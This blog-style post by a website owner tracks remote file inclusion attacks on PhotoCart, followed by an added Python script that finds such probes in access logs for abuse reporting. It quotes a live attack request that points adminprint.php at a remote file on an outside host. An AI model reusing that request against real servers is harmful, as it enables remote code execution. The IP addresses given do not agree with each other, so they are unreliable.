The PhotoCart attackers regrouped quickly after their other compromised server was cleaned up and launched a new wave based on the file they are trying to upload being hosted within Layeredtech.
The file is now being referenced here:
"/PhotoCart/adminprint.php?path=http://artelj.com/c.ar?"
That's in the Layeredtech network somewhere:
host artelj.com has address 18.104.22.168
host 22.214.171.124 -> server2.soloymi.com.
OrgName: Layered Technologies, Inc.
NetRange: 126.96.36.199 - 188.8.131.52
This game of cat and mouse is getting old, but if they want to keep playing then I'll keep getting their playgrounds closed one at a time.
The only upside today is the botnet that hit my server was much smaller than in the past and didn't include any IPs from theplanet.com, so perhaps they shut down those compromised locations. Will keep monitoring to see if theplanet.com IPs are used from this point forward to see if they resolved this or not.
Oh well, more letters to write to abuse@bunch-o-companies, sigh...
UPDATE: Looks like it might be the typical vulnerability hackers from Turkey as I caught them hitting my site looking for /PhotoCart/ using a Google INURL search.
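An added example, not part of the original post: a small access-log scan that finds requests like the adminprint.php one above, where a query parameter carries a remote URL, and groups them by the host serving the file so each abuse report can list the clients involved. The log lines, client IPs and the /out.php allowlist entry are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format; the client IPs are
# documentation addresses, not data from the post.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2008:10:00:01 +0000] "GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar? HTTP/1.1" 404 210 "-" "-"
192.0.2.44 - - [01/Jan/2008:10:00:03 +0000] "GET /PhotoCart/adminprint.php?path=http%3A%2F%2Fartelj.com%2Fc.ar%3F HTTP/1.1" 404 210 "-" "-"
198.51.100.7 - - [01/Jan/2008:10:01:12 +0000] "GET /gallery/index.php?page=2 HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [01/Jan/2008:10:02:40 +0000] "GET /out.php?url=https://example.org/ HTTP/1.1" 302 0 "-" "-"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Hypothetical allowlist: (path, parameter) pairs that legitimately take a URL.
ALLOWED = {("/out.php", "url")}

def find_rfi_probes(log_text, allowed=ALLOWED):
    """Return {remote_host: {"clients": set, "paths": set}} for requests
    whose query parameters point at a remote URL."""
    hits = defaultdict(lambda: {"clients": set(), "paths": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values, so encoded probes are caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if (parts.path, name) in allowed:
                continue
            value = value.strip()
            if REMOTE_RE.match(value):
                host = urlsplit(value).hostname or "?"
                hits[host]["clients"].add(client)
                hits[host]["paths"].add(parts.path)
    return dict(hits)

if __name__ == "__main__":
    for host, info in find_rfi_probes(SAMPLE_LOG).items():
        print(f"{host}: {len(info['clients'])} client(s), "
              f"paths={sorted(info['paths'])}")
```

Grouping by the remote host rather than by client gives one entry per hosting provider to notify, with the requesting clients attached as evidence.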